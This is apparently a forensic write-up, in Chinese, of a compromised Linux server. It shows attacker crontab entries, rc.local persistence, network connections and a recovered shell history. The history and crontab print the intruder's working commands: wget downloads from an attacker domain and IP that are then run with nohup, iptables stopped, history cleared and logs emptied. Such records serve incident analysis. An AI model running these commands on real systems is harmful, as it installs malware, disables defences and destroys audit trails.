Linux 被黑

/etc/rc.local 被添加了以下内容(开机时自动执行):
cd /etc;./ksapd
cd /etc;./kysapd
cd /etc;./atdd

网络连接
tcp        0      0  ?.?.?.?:50004          121.12.110.96:10991         ESTABLISHED 23984/./sksapd     
tcp        0      0  ?.?.?.?:7029           112.90.22.197:10991         ESTABLISHED 23977/./skysapd    
tcp        0      0  ?.?.?.?:49999          121.12.110.96:10991         ESTABLISHED 23952/./ksapd

进程
root     23952     1 23952 23952 99 21:16 ?        00:51:14   ./ksapd
root     23962     1 23962 23962  0 21:16 ?        00:00:02   ./kysapd
root     23970     1 23970 23970  0 21:16 ?        00:00:03   ./atdd
root     23977     1 23977 23977 99 21:16 ?        00:55:01   ./skysapd
root     23984     1 23984 23984 99 21:16 ?        00:52:43   ./sksapd

历史命令(history)被清除

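crontab 被修改(以下为 root 的 crontab,已用 grep 过滤掉含 # 的行)
注:形如 `cd DIR > FILE` 的条目,重定向是在 cd 执行之前、于 cron 任务的当前目录(通常是该用户的 HOME)下打开并清空 FILE;因此 `cd /var/log > secure` 清空的未必是 /var/log/secure,应单独核对该日志是否完整。另外,*/101、*/99 等步长超出了分钟字段 0–59 的范围,实际触发频率取决于 cron 实现,不宜按字面理解。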
[root@web ~]# grep -v \#  /var/spool/cron/root
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd                
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * cd /etc; rm -rf dir sksapd.*
*/1 * * * * cd /etc; rm -rf dir skysapd.*
*/99 * * * * cd /root > .bash_history
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/skysapd
*/99 * * * * killall -9 cupsdd
*/1 * * * * killall -9 node24
*/98 * * * * killall -9 ksapd
*/96 * * * * killall -9 kysapd
*/96 * * * * killall -9 atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/96 * * * * killall -9 sksapd
*/96 * * * * killall -9 skysapd
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * /etc/init.d/iptables stop
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/99 * * * * cd /etc;./ksapd
*/97 * * * * cd /etc;./kysapd
*/97 * * * * cd /etc;./atdd
*/69 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/97 * * * * cd /etc;./sksapd
*/97 * * * * cd /etc;./skysapd
*/79 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/89 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/99 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * cd /etc; rm -rf dir cupsdd.*
*/1 * * * * cd /etc; rm -rf dir kysapd.*
*/1 * * * * cd /etc; rm -rf dir ksapd.*
*/1 * * * * cd /etc; rm -rf dir atdd.*
*/1 * * * * killall -9 freeBSD
*/1 * * * * history -c
*/15 * * * * cd /var/log > secure







[root@web tmp]#
[root@web tmp]# cat /tmp/tttt
   12  2014-01-20 18:56:48 root killall sshbin
   13  2014-01-20 18:56:48 root killall xudp
   14  2014-01-20 18:56:48 root killall xupd1
   15  2014-01-20 18:56:48 root killall xudp2
   16  2014-01-20 18:56:48 root killall xudp3
   17  2014-01-20 18:56:48 root killall xudp4
   18  2014-01-20 18:56:48 root killall xudp5
   19  2014-01-20 18:56:48 root killall /etc/idmapd/idmapd.so.cp
   20  2014-01-20 18:56:48 root killall idmapd.so.cp
   21  2014-01-20 18:56:48 root killall .IptabLex
   22  2014-01-20 18:56:48 root killall .IptabLes
   23  2014-01-20 18:56:48 root killall linuxssh
   24  2014-01-20 18:56:48 root killall strutsbin
   25  2014-01-20 18:56:48 root killall 266189
   26  2014-01-20 18:56:48 root killall auto.bin
   27  2014-01-20 18:56:48 root rm -f -r /etc/idmapd/idmapd.so.cp
   28  2014-01-20 18:56:48 root rm -f -r /tmp/linuxx
   29  2014-01-20 18:56:48 root rm -f -r /tmp/ssh3
   30  2014-01-20 18:56:48 root rm -f -r /tmp/sh4
   31  2014-01-20 18:56:48 root rm -f -r /tmp/ssh6
   32  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-32
   33  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-64
   34  2014-01-20 18:56:48 root rm -f -r /tmp/ssh-c4
   35  2014-01-20 18:56:48 root rm -f -r /tmp/drmc
   36  2014-01-20 18:56:48 root rm -f -r /tmp/tmpof
   37  2014-01-20 18:56:48 root rm -f -r /tmp/1471
   38  2014-01-20 18:56:48 root rm -f -r /tmp/1417
   39  2014-01-20 18:56:48 root rm -f -r /tmp/v432
   40  2014-01-20 18:56:48 root rm -f -r /tmp/v532
   41  2014-01-20 18:56:48 root rm -f -r /tmp/29881
   42  2014-01-20 18:56:48 root rm -f -r /tmp/10993
   43  2014-01-20 18:56:48 root rm -f -r /tmp/behsdf
   44  2014-01-20 18:56:48 root rm -f -r /tmp/helen
   45  2014-01-20 18:56:48 root rm -f -r /tmp/lampp
   46  2014-01-20 18:56:48 root rm -f -r /tmp/Umi34Ber
   47  2014-01-20 18:56:48 root rm -f -r /tmp/mysql.sock
   48  2014-01-20 18:56:48 root rm -f -r /tmp/266189
   49  2014-01-20 18:56:48 root rm -f -r /etc/x1
   50  2014-01-20 18:56:48 root rm -f -r /etc/xxx
   51  2014-01-20 18:56:48 root rm -f -r /etc/dos32
   52  2014-01-20 18:56:48 root rm -f -r /etc/dos64
   53  2014-01-20 18:56:48 root rm -f -r /etc/007
   54  2014-01-20 18:56:48 root rm -f -r /etc/t32
   55  2014-01-20 18:56:48 root rm -f -r /etc/lq64
   56  2014-01-20 18:56:48 root rm -f -r /etc/t64
   57  2014-01-20 18:56:48 root rm -f -r /etc/lq32
   58  2014-01-20 18:56:48 root rm -f -r /etc/java.132.8_11
   59  2014-01-20 18:56:48 root rm -f -r /etc/idmapd/apd.so.cp
   60  2014-01-20 18:56:48 root rm -f -r /tmp/sshbin
   61  2014-01-20 18:56:48 root rm -f -r /tmp/xudp
   62  2014-01-20 18:56:48 root rm -f -r /tmp/xupd1
   63  2014-01-20 18:56:48 root rm -f -r /tmp/xudp2
   64  2014-01-20 18:56:48 root rm -f -r /tmp/xudp3
   65  2014-01-20 18:56:48 root rm -f -r /tmp/xudp4
   66  2014-01-20 18:56:48 root rm -f -r /tmp/xudp5
   67  2014-01-20 18:56:48 root rm -f -r /tmp/java.2.15.22_20
   68  2014-01-20 18:56:48 root rm -f -r /tmp/linuxssh
   69  2014-01-20 18:56:48 root rm -f -r /tmp/strutsbin
   70  2014-01-20 18:56:48 root rm -f -r /tmp/266189
   71  2014-01-20 18:56:48 root rm -f -r etc/java.13.2.8_11
   72  2014-01-20 18:56:48 root rm -f -r /etc/auto.bin
   73  2014-01-20 18:56:48 root find /etc/ -name "*.service2" -exec rm {} \;
   74  2014-01-20 18:56:48 root killall java-2013
   75  2014-01-20 18:56:48 root killall wins
   76  2014-01-20 18:56:48 root rm -f -r /etc/wins
   77  2014-01-20 18:56:48 root rm -f -r /etc/java-2013
   78  2014-01-20 18:56:48 root rm -f -r /etc/java-2013/java-2013
   79  2014-01-20 18:56:48 root mkdir /etc/wins
   80  2014-01-20 18:56:48 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
   81  2014-01-20 18:56:49 root chmod 0755 /etc/wins/wins
   82  2014-01-20 18:56:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
   83  2014-01-20 18:56:49 root rm -f -r /etc/rc.local
   84  2014-01-20 18:56:49 root rm -r -f /etc/rc.d/rc.local
   85  2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
   86  2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.local
   87  2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
   88  2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
   89  2014-01-20 18:56:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
   90  2014-01-20 18:56:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
   91  2014-01-20 18:56:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
   92  2014-01-20 18:56:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
   93  2014-01-20 18:56:49 root rm -f -r 2618
   94  2014-01-20 18:56:49 root rm -r -f TS269
   95  2014-01-20 18:56:49 root exit
   96  2014-01-20 18:44:53 root ps -ef  |more
   97  2014-01-20 18:45:44 root history |more
   98  2014-01-20 18:53:10 root passwd
   99  2014-01-20 18:58:15 root exit
  100  2014-01-20 19:14:16 root passwd
  101  2014-01-20 19:15:40 root exit
  102  2014-01-20 19:18:07 root top
  103  2014-01-20 19:19:03 root ps -ef |more
  104  2014-01-20 19:19:47 root lsof -p 23656
  105  2014-01-20 19:19:59 root lsof -p 23656
  106  2014-01-20 19:20:03 root ps -ef |more
  107  2014-01-20 19:21:25 root cd /etc/wins/wins
  108  2014-01-20 19:21:31 root cd /etc/wins
  109  2014-01-20 19:21:47 root cd /etc/wins
  110  2014-01-20 19:21:58 root lll -a /
  111  2014-01-20 19:22:03 root ll -a /
  112  2014-01-20 19:22:14 root ll -a /boot/
  113  2014-01-20 19:23:00 root cd /etc/liunx
  114  2014-01-20 19:23:13 root cd /etc/idmapd
  115  2014-01-20 19:23:15 root ls\
  116  2014-01-20 19:23:19 root ls
  117  2014-01-20 19:23:29 root ll -a
  118  2014-01-20 19:23:43 root rm .idmapd_open
  119  2014-01-20 19:23:53 root ll -a
  120  2014-01-20 19:26:12 root cd /etc/rc.local
  121  2014-01-20 19:26:21 root cd /etc/rc.local
  122  2014-01-20 19:26:43 root cd /etc/rc.d/rc.local
  123  2014-01-20 19:26:53 root ps -ef |more
  124  2014-01-20 19:28:49 root cd /etc/wins
  125  2014-01-20 19:29:02 root ll -a /wins
  126  2014-01-20 19:29:11 root ll -a /etc/wins
  127  2014-01-20 19:29:20 root pwd
  128  2014-01-20 19:29:27 root ll -a /etc/
  129  2014-01-20 19:29:34 root ll -a /etc/ |more
  130  2014-01-20 19:35:12 root ll -a /etc/
  131  2014-01-20 19:35:20 root ll -a /etc/ |more
  132  2014-01-20 19:35:36 root ps -ef|more
  133  2014-01-20 19:36:17 root history
  134  2014-01-20 19:36:23 root history |more
  135  2014-01-20 19:40:44 root cd /etc/java-2013
  136  2014-01-20 19:40:53 root ll -a /tmp
  137  2014-01-20 19:41:17 root ll -a /tmp
  138  2014-01-20 19:41:21 root ll -a /tmp
  139  2014-01-20 19:45:35 root cat /root/killback.sh
  140  2014-01-20 19:45:50 root ll -a /tmp
  141  2014-01-20 19:46:04 root rm java.pl
  142  2014-01-20 19:46:14 root rm -r java.pl
  143  2014-01-20 19:46:23 root ll -a /tmp
  144  2014-01-20 19:46:35 root rm -r -f java.pl
  145  2014-01-20 19:46:37 root ll -a /tmp
  146  2014-01-20 19:46:41 root ll -a /tmp
  147  2014-01-20 19:46:44 root ll -a /tmp
  148  2014-01-20 19:46:56 root rm -r -f java.pl
  149  2014-01-20 19:46:58 root ll -a /tmp
  150  2014-01-20 19:48:00 root exit
  151  2014-01-20 19:18:36 root top
  152  2014-01-20 19:18:43 root ps -efjH
  153  2014-01-20 19:18:59 root cd /etc/
  154  2014-01-20 19:19:03 root rm -rf wins/
  155  2014-01-20 19:19:13 root kill 23656 23656
  156  2014-01-20 19:19:18 root ps -efjH
  157  2014-01-20 19:19:47 root netstat -nltp
  158  2014-01-20 19:21:13 root netstat -natp|grep EST|grep ssh
  159  2014-01-20 19:21:22 root history|grep netsta
  160  2014-01-20 19:21:28 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
  161  2014-01-20 19:21:30 root netstat -natp|grep EST|grep -vE 'mysql|java|nginx|mem'
  162  2014-01-20 19:28:33 root cd /opt/apache-tomcat-6.0.26/webapps/
  163  2014-01-20 19:28:34 root ls
  164  2014-01-20 19:28:35 root cd ROOT/
  165  2014-01-20 19:28:37 root git status
  166  2014-01-20 19:57:05 root ll /etc/wi
  167  2014-01-20 19:57:07 root ll /etc/wi
  168  2014-01-20 20:08:03 root ps -efjH
  169  2014-01-20 20:08:14 root ps -efjH
  170  2014-01-20 20:08:16 root ps -efjH
  171  2014-01-20 20:08:17 root ps -efjH
  172  2014-01-20 21:25:27 root top
  173  2014-01-20 21:26:39 root top -d 30
  174  2014-01-20 21:27:39 root /etc/init.d/iptables stop
  175  2014-01-20 21:27:39 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  176  2014-01-20 21:27:39 root chmod 0775 /usr/bin/nohup
  177  2014-01-20 21:27:39 root chmod 0775 /usr/bin/killall
  178  2014-01-20 21:27:39 root killall lixtest
  179  2014-01-20 21:27:39 root killall linuxx
  180  2014-01-20 21:27:39 root killall ssh3
  181  2014-01-20 21:27:39 root killall ssh4
  182  2014-01-20 21:27:39 root killall ssh6
  183  2014-01-20 21:27:39 root killall ssh-32
  184  2014-01-20 21:27:39 root killall ssh-64
  185  2014-01-20 21:27:39 root killall ssh-c4
  186  2014-01-20 21:27:39 root killall java.13.2.8_11
  187  2014-01-20 21:27:39 root killall drmc
  188  2014-01-20 21:27:39 root killall tmpof
  189  2014-01-20 21:27:39 root killall 1471
  190  2014-01-20 21:27:39 root killall 1417
  191  2014-01-20 21:27:39 root killall v432
  192  2014-01-20 21:27:39 root killall v532
  193  2014-01-20 21:27:39 root killall 29881
  194  2014-01-20 21:27:39 root killall 10993
  195  2014-01-20 21:27:39 root killall behsdf
  196  2014-01-20 21:27:39 root killall helen
  197  2014-01-20 21:27:39 root killall lampp
  198  2014-01-20 21:27:39 root killall Umi34Ber
  199  2014-01-20 21:27:39 root killall mysql.sock
  200  2014-01-20 21:27:39 root killall sshd
  201  2014-01-20 21:27:39 root killall xxx
  202  2014-01-20 21:27:39 root killall dos32
  203  2014-01-20 21:27:39 root killall dos64
  204  2014-01-20 21:27:39 root killall 007
  205  2014-01-20 21:27:39 root killall t32
  206  2014-01-20 21:27:39 root killall lq64
  207  2014-01-20 21:27:39 root killall t64
  208  2014-01-20 21:27:39 root killall lq32
  209  2014-01-20 21:27:40 root killall java.132.8_11
  210  2014-01-20 21:27:40 root killall 261180
  211  2014-01-20 21:27:40 root killall sshbin
  212  2014-01-20 21:27:40 root killall xudp
  213  2014-01-20 21:27:40 root killall xupd1
  214  2014-01-20 21:27:40 root killall xudp2
  215  2014-01-20 21:27:40 root killall xudp3
  216  2014-01-20 21:27:40 root killall xudp4
  217  2014-01-20 21:27:40 root killall xudp5
  218  2014-01-20 21:27:40 root killall /etc/idmapd/idmapd.so.cp
  219  2014-01-20 21:27:40 root killall idmapd.so.cp
  220  2014-01-20 21:27:40 root killall .IptabLex
  221  2014-01-20 21:27:40 root killall .IptabLes
  222  2014-01-20 21:27:40 root killall linuxssh
  223  2014-01-20 21:27:40 root killall strutsbin
  224  2014-01-20 21:27:40 root killall 266189
  225  2014-01-20 21:27:40 root killall auto.bin
  226  2014-01-20 21:27:40 root rm -f -r /etc/idmapd/idmapd.so.cp
  227  2014-01-20 21:27:40 root rm -f -r /tmp/linuxx
  228  2014-01-20 21:27:40 root rm -f -r /tmp/ssh3
  229  2014-01-20 21:27:40 root rm -f -r /tmp/sh4
  230  2014-01-20 21:27:40 root rm -f -r /tmp/ssh6
  231  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-32
  232  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-64
  233  2014-01-20 21:27:40 root rm -f -r /tmp/ssh-c4
  234  2014-01-20 21:27:40 root rm -f -r /tmp/drmc
  235  2014-01-20 21:27:40 root rm -f -r /tmp/tmpof
  236  2014-01-20 21:27:40 root rm -f -r /tmp/1471
  237  2014-01-20 21:27:40 root rm -f -r /tmp/1417
  238  2014-01-20 21:27:40 root rm -f -r /tmp/v432
  239  2014-01-20 21:27:40 root rm -f -r /tmp/v532
  240  2014-01-20 21:27:40 root rm -f -r /tmp/29881
  241  2014-01-20 21:27:40 root rm -f -r /tmp/10993
  242  2014-01-20 21:27:40 root rm -f -r /tmp/behsdf
  243  2014-01-20 21:27:40 root rm -f -r /tmp/helen
  244  2014-01-20 21:27:40 root rm -f -r /tmp/lampp
  245  2014-01-20 21:27:40 root rm -f -r /tmp/Umi34Ber
  246  2014-01-20 21:27:40 root rm -f -r /tmp/mysql.sock
  247  2014-01-20 21:27:40 root rm -f -r /tmp/266189
  248  2014-01-20 21:27:40 root rm -f -r /etc/x1
  249  2014-01-20 21:27:40 root rm -f -r /etc/xxx
  250  2014-01-20 21:27:40 root rm -f -r /etc/dos32
  251  2014-01-20 21:27:40 root rm -f -r /etc/dos64
  252  2014-01-20 21:27:40 root rm -f -r /etc/007
  253  2014-01-20 21:27:40 root rm -f -r /etc/t32
  254  2014-01-20 21:27:40 root rm -f -r /etc/lq64
  255  2014-01-20 21:27:40 root rm -f -r /etc/t64
  256  2014-01-20 21:27:40 root rm -f -r /etc/lq32
  257  2014-01-20 21:27:40 root rm -f -r /etc/java.132.8_11
  258  2014-01-20 21:27:40 root rm -f -r /etc/idmapd/apd.so.cp
  259  2014-01-20 21:27:40 root rm -f -r /tmp/sshbin
  260  2014-01-20 21:27:40 root rm -f -r /tmp/xudp
  261  2014-01-20 21:27:40 root rm -f -r /tmp/xupd1
  262  2014-01-20 21:27:40 root rm -f -r /tmp/xudp2
  263  2014-01-20 21:27:40 root rm -f -r /tmp/xudp3
  264  2014-01-20 21:27:40 root rm -f -r /tmp/xudp4
  265  2014-01-20 21:27:40 root rm -f -r /tmp/xudp5
  266  2014-01-20 21:27:40 root rm -f -r /tmp/java.2.15.22_20
  267  2014-01-20 21:27:40 root rm -f -r /tmp/linuxssh
  268  2014-01-20 21:27:40 root rm -f -r /tmp/strutsbin
  269  2014-01-20 21:27:40 root rm -f -r /tmp/266189
  270  2014-01-20 21:27:40 root rm -f -r etc/java.13.2.8_11
  271  2014-01-20 21:27:40 root rm -f -r /etc/auto.bin
  272  2014-01-20 21:27:40 root find /etc/ -name "*.service2" -exec rm {} \;
  273  2014-01-20 21:27:40 root killall java-2013
  274  2014-01-20 21:27:40 root killall wins
  275  2014-01-20 21:27:40 root rm -f -r /etc/wins
  276  2014-01-20 21:27:40 root rm -f -r /etc/java-2013
  277  2014-01-20 21:27:40 root rm -f -r /etc/java-2013/java-2013
  278  2014-01-20 21:27:40 root mkdir /etc/wins
  279  2014-01-20 21:27:40 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  280  2014-01-20 21:27:41 root chmod 0755 /etc/wins/wins
  281  2014-01-20 21:27:41 root nohup /etc/wins/wins > /dev/null 2>&1 &
  282  2014-01-20 21:27:41 root rm -f -r /etc/rc.local
  283  2014-01-20 21:27:41 root rm -r -f /etc/rc.d/rc.local
  284  2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  285  2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.local
  286  2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  287  2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  288  2014-01-20 21:27:41 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  289  2014-01-20 21:27:41 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  290  2014-01-20 21:27:41 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  291  2014-01-20 21:27:41 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  292  2014-01-20 21:27:41 root rm -f -r 2618
  293  2014-01-20 21:27:41 root rm -r -f TS269
  294  2014-01-20 21:27:41 root exit
  295  2014-01-20 21:29:46 root /etc/init.d/iptables stop
  296  2014-01-20 21:29:46 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  297  2014-01-20 21:29:46 root chmod 0775 /usr/bin/nohup
  298  2014-01-20 21:29:46 root chmod 0775 /usr/bin/killall
  299  2014-01-20 21:29:46 root killall lixtest
  300  2014-01-20 21:29:46 root killall linuxx
  301  2014-01-20 21:29:46 root killall ssh3
  302  2014-01-20 21:29:46 root killall ssh4
  303  2014-01-20 21:29:46 root killall ssh6
  304  2014-01-20 21:29:46 root killall ssh-32
  305  2014-01-20 21:29:46 root killall ssh-64
  306  2014-01-20 21:29:46 root killall ssh-c4
  307  2014-01-20 21:29:46 root killall java.13.2.8_11
  308  2014-01-20 21:29:46 root killall drmc
  309  2014-01-20 21:29:46 root killall tmpof
  310  2014-01-20 21:29:46 root killall 1471
  311  2014-01-20 21:29:46 root killall 1417
  312  2014-01-20 21:29:46 root killall v432
  313  2014-01-20 21:29:46 root killall v532
  314  2014-01-20 21:29:46 root killall 29881
  315  2014-01-20 21:29:46 root killall 10993
  316  2014-01-20 21:29:46 root killall behsdf
  317  2014-01-20 21:29:46 root killall helen
  318  2014-01-20 21:29:46 root killall lampp
  319  2014-01-20 21:29:46 root killall Umi34Ber
  320  2014-01-20 21:29:46 root killall mysql.sock
  321  2014-01-20 21:29:46 root killall sshd
  322  2014-01-20 21:29:46 root killall xxx
  323  2014-01-20 21:29:46 root killall dos32
  324  2014-01-20 21:29:46 root killall dos64
  325  2014-01-20 21:29:46 root killall 007
  326  2014-01-20 21:29:46 root killall t32
  327  2014-01-20 21:29:46 root killall lq64
  328  2014-01-20 21:29:46 root killall t64
  329  2014-01-20 21:29:46 root killall lq32
  330  2014-01-20 21:29:46 root killall java.132.8_11
  331  2014-01-20 21:29:46 root killall 261180
  332  2014-01-20 21:29:46 root killall sshbin
  333  2014-01-20 21:29:46 root killall xudp
  334  2014-01-20 21:29:46 root killall xupd1
  335  2014-01-20 21:29:46 root killall xudp2
  336  2014-01-20 21:29:46 root killall xudp3
  337  2014-01-20 21:29:46 root killall xudp4
  338  2014-01-20 21:29:46 root killall xudp5
  339  2014-01-20 21:29:46 root killall /etc/idmapd/idmapd.so.cp
  340  2014-01-20 21:29:46 root killall idmapd.so.cp
  341  2014-01-20 21:29:46 root killall .IptabLex
  342  2014-01-20 21:29:46 root killall .IptabLes
  343  2014-01-20 21:29:46 root killall linuxssh
  344  2014-01-20 21:29:46 root killall strutsbin
  345  2014-01-20 21:29:46 root killall 266189
  346  2014-01-20 21:29:46 root killall auto.bin
  347  2014-01-20 21:29:46 root rm -f -r /etc/idmapd/idmapd.so.cp
  348  2014-01-20 21:29:46 root rm -f -r /tmp/linuxx
  349  2014-01-20 21:29:46 root rm -f -r /tmp/ssh3
  350  2014-01-20 21:29:46 root rm -f -r /tmp/sh4
  351  2014-01-20 21:29:46 root rm -f -r /tmp/ssh6
  352  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-32
  353  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-64
  354  2014-01-20 21:29:46 root rm -f -r /tmp/ssh-c4
  355  2014-01-20 21:29:46 root rm -f -r /tmp/drmc
  356  2014-01-20 21:29:46 root rm -f -r /tmp/tmpof
  357  2014-01-20 21:29:46 root rm -f -r /tmp/1471
  358  2014-01-20 21:29:46 root rm -f -r /tmp/1417
  359  2014-01-20 21:29:46 root rm -f -r /tmp/v432
  360  2014-01-20 21:29:46 root rm -f -r /tmp/v532
  361  2014-01-20 21:29:46 root rm -f -r /tmp/29881
  362  2014-01-20 21:29:46 root rm -f -r /tmp/10993
  363  2014-01-20 21:29:46 root rm -f -r /tmp/behsdf
  364  2014-01-20 21:29:46 root rm -f -r /tmp/helen
  365  2014-01-20 21:29:46 root rm -f -r /tmp/lampp
  366  2014-01-20 21:29:46 root rm -f -r /tmp/Umi34Ber
  367  2014-01-20 21:29:46 root rm -f -r /tmp/mysql.sock
  368  2014-01-20 21:29:46 root rm -f -r /tmp/266189
  369  2014-01-20 21:29:46 root rm -f -r /etc/x1
  370  2014-01-20 21:29:46 root rm -f -r /etc/xxx
  371  2014-01-20 21:29:46 root rm -f -r /etc/dos32
  372  2014-01-20 21:29:46 root rm -f -r /etc/dos64
  373  2014-01-20 21:29:46 root rm -f -r /etc/007
  374  2014-01-20 21:29:46 root rm -f -r /etc/t32
  375  2014-01-20 21:29:46 root rm -f -r /etc/lq64
  376  2014-01-20 21:29:46 root rm -f -r /etc/t64
  377  2014-01-20 21:29:46 root rm -f -r /etc/lq32
  378  2014-01-20 21:29:46 root rm -f -r /etc/java.132.8_11
  379  2014-01-20 21:29:46 root rm -f -r /etc/idmapd/apd.so.cp
  380  2014-01-20 21:29:46 root rm -f -r /tmp/sshbin
  381  2014-01-20 21:29:46 root rm -f -r /tmp/xudp
  382  2014-01-20 21:29:46 root rm -f -r /tmp/xupd1
  383  2014-01-20 21:29:46 root rm -f -r /tmp/xudp2
  384  2014-01-20 21:29:46 root rm -f -r /tmp/xudp3
  385  2014-01-20 21:29:46 root rm -f -r /tmp/xudp4
  386  2014-01-20 21:29:46 root rm -f -r /tmp/xudp5
  387  2014-01-20 21:29:46 root rm -f -r /tmp/java.2.15.22_20
  388  2014-01-20 21:29:46 root rm -f -r /tmp/linuxssh
  389  2014-01-20 21:29:46 root rm -f -r /tmp/strutsbin
  390  2014-01-20 21:29:46 root rm -f -r /tmp/266189
  391  2014-01-20 21:29:46 root rm -f -r etc/java.13.2.8_11
  392  2014-01-20 21:29:46 root rm -f -r /etc/auto.bin
  393  2014-01-20 21:29:46 root find /etc/ -name "*.service2" -exec rm {} \;
  394  2014-01-20 21:29:46 root killall java-2013
  395  2014-01-20 21:29:46 root killall wins
  396  2014-01-20 21:29:47 root rm -f -r /etc/wins
  397  2014-01-20 21:29:47 root rm -f -r /etc/java-2013
  398  2014-01-20 21:29:47 root rm -f -r /etc/java-2013/java-2013
  399  2014-01-20 21:29:47 root mkdir /etc/wins
  400  2014-01-20 21:29:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  401  2014-01-20 21:29:48 root chmod 0755 /etc/wins/wins
  402  2014-01-20 21:29:48 root nohup /etc/wins/wins > /dev/null 2>&1 &
  403  2014-01-20 21:29:48 root rm -f -r /etc/rc.local
  404  2014-01-20 21:29:48 root rm -r -f /etc/rc.d/rc.local
  405  2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  406  2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.local
  407  2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  408  2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  409  2014-01-20 21:29:48 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  410  2014-01-20 21:29:48 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  411  2014-01-20 21:29:48 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  412  2014-01-20 21:29:48 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  413  2014-01-20 21:29:48 root rm -f -r 2618
  414  2014-01-20 21:29:48 root rm -r -f TS269
  415  2014-01-20 21:29:48 root exit
  416  2014-01-20 21:37:20 root ls
  417  2014-01-20 21:37:30 root ps -ef |more
  418  2014-01-20 21:38:17 root ps -ef |more
  419  2014-01-20 21:38:59 root ps -ef |more
  420  2014-01-20 21:39:54 root top
  421  2014-01-20 21:40:23 root cd /etc/wins
  422  2014-01-20 21:40:24 root ls
  423  2014-01-20 21:40:31 root ll -a ./
  424  2014-01-20 21:40:47 root rm -r -f /etc/wins
  425  2014-01-20 21:40:59 root ll -a /
  426  2014-01-20 21:41:10 root ll -a /boot/
  427  2014-01-20 21:41:50 root crontab -l
  428  2014-01-20 21:45:00 root crontab -l
  429  2014-01-20 21:45:05 root /etc/init.d/iptables stop
  430  2014-01-20 21:45:05 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  431  2014-01-20 21:45:05 root chmod 0775 /usr/bin/nohup
  432  2014-01-20 21:45:05 root chmod 0775 /usr/bin/killall
  433  2014-01-20 21:45:05 root killall lixtest
  434  2014-01-20 21:45:05 root killall linuxx
  435  2014-01-20 21:45:05 root killall ssh3
  436  2014-01-20 21:45:05 root killall ssh4
  437  2014-01-20 21:45:05 root killall ssh6
  438  2014-01-20 21:45:05 root killall ssh-32
  439  2014-01-20 21:45:05 root killall ssh-64
  440  2014-01-20 21:45:05 root killall ssh-c4
  441  2014-01-20 21:45:05 root killall java.13.2.8_11
  442  2014-01-20 21:45:05 root killall drmc
  443  2014-01-20 21:45:05 root killall tmpof
  444  2014-01-20 21:45:05 root killall 1471
  445  2014-01-20 21:45:05 root killall 1417
  446  2014-01-20 21:45:05 root killall v432
  447  2014-01-20 21:45:05 root killall v532
  448  2014-01-20 21:45:05 root killall 29881
  449  2014-01-20 21:45:06 root killall 10993
  450  2014-01-20 21:45:06 root killall behsdf
  451  2014-01-20 21:45:06 root killall helen
  452  2014-01-20 21:45:06 root killall lampp
  453  2014-01-20 21:45:06 root killall Umi34Ber
  454  2014-01-20 21:45:06 root killall mysql.sock
  455  2014-01-20 21:45:06 root killall sshd
  456  2014-01-20 21:45:06 root killall xxx
  457  2014-01-20 21:45:06 root killall dos32
  458  2014-01-20 21:45:06 root killall dos64
  459  2014-01-20 21:45:06 root killall 007
  460  2014-01-20 21:45:06 root killall t32
  461  2014-01-20 21:45:06 root killall lq64
  462  2014-01-20 21:45:06 root killall t64
  463  2014-01-20 21:45:06 root killall lq32
  464  2014-01-20 21:45:06 root killall java.132.8_11
